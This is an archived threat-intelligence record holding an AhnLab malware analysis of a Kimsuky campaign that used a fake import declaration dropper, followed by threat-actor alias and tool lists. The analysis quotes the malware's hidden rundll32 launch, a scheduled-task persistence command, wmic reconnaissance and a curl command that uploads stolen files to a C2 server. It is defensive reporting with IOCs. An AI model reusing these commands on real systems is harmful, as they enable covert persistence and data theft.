{
	"id": "ec043e92-0a7c-48a4-ba69-a0f177d5a7ca",
	"created_at": "2026-04-06T00:19:51.941591Z",
	"updated_at": "2026-04-10T03:37:41.034166Z",
	"deleted_at": null,
	"sha1_hash": "f81925c3c07bed117f722677f30006cc7cc29aec",
	"title": "Kimsuky Targets South Korean Research Institutes with Fake Import Declaration",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3176395,
	"plain_text": "Kimsuky Targets South Korean Research Institutes with Fake\r\nImport Declaration\r\nBy ATCP\r\nPublished: 2023-11-20 · Archived: 2026-04-05 23:03:59 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently identified that the Kimsuky threat group is\r\ndistributing a malicious JSE file disguised as an import declaration to research institutes in South Korea. The\r\nthreat actor ultimately uses a backdoor to steal information and execute commands.\r\nThe file name of the dropper disguised as an import declaration is as follows.\r\nImport Declaration_Official Stamp Affixed.jse\r\nThe file contains an obfuscated PowerShell script, a Base64-encoded backdoor file, and a legitimate PDF file.\r\nhttps://asec.ahnlab.com/en/59387/\r\nPage 1 of 5\n\nA legitimate PDF file is saved under the file name ‘Import Declaration.PDF’ and automatically executed by the\r\nPowerShell script. This file contains the attack target’s information. Creating and executing a legitimate PDF file\r\nis likely done to prevent users from recognizing that a malicious backdoor file is being executed in the process.\n\nIn the background, a backdoor is created in the %ProgramData% path under the file name ‘vuVvMKg.i3IO’, and\r\nthe malware is run using rundll32.exe.\r\npowershell.exe -windowstyle hidden rundll32.exe ProgramData\\\\vuVuMKg.i3IO UpdateSystem\r\nThe malware copies itself into the %ProgramData% and %Public% paths under the file name ‘IconCache.db’ for\r\npersistence before registering itself to the task scheduler.\r\ncmd.exe /c schtasks /create /tn iconcache /tr “rundll32.exe C:\\Programdata\\IconCache.db UpdateSystem” /sc\r\nonlogon /rl highest /f\r\nTo exfiltrate system information, the backdoor uses the wmic command to check the anti-malware status of the\r\nattack target and collects network information through the ipconfig command.\r\ncmd.exe /U /c wmic /namespace:\\\\root\\securitycenter2 path\r\nantivirusproduct get displayname \u003e vaccine.txt\r\nipconfig /all\r\nAfterwards, information such as the host name, user name, and OS information is collected. For the malware to\r\navoid detection, it encodes the command execution results and sends them to the C2.\n\nAlso, the following commands (including system information exfiltration) are run, behaving as a backdoor in the\r\naffected system. Additionally, the curl tool is used to upload information to the C2 server.\r\ngetinfo: System information\r\ndie: Terminate\r\nwhere: Execution path\r\nrun: Run certain files and commands\r\ncurl -k -F “fileToUpload=@%s” -F “id=%S” %s\r\nBecause the bait file is also run, users cannot recognize that their systems are infected by malware. As these types\r\nof malware mainly attack specific targets, users should refrain from running attachments in emails sent from\r\nunknown sources.\r\n[File Detection]\r\nDropper/JS.Generic (2023.11.16.02)\r\nBackdoor/Win.Nikidoor (2023.11.15.03)\r\nMD5\r\nd2335df6d17fc7c2a5d0583423e39ff8\r\nd6abeeb469e2417bbcd3c122c06ba099\n\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//rscnode[.]dothome[.]co[.]kr/index[.]php\r\nhttp[:]//rscnode[.]dothome[.]co[.]kr/upload[.]php\r\nSource: https://asec.ahnlab.com/en/59387/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/59387/"
	],
	"report_names": [
		"59387"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434791,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f81925c3c07bed117f722677f30006cc7cc29aec.pdf",
		"text": "https://archive.orkl.eu/f81925c3c07bed117f722677f30006cc7cc29aec.txt",
		"img": "https://archive.orkl.eu/f81925c3c07bed117f722677f30006cc7cc29aec.jpg"
	}
}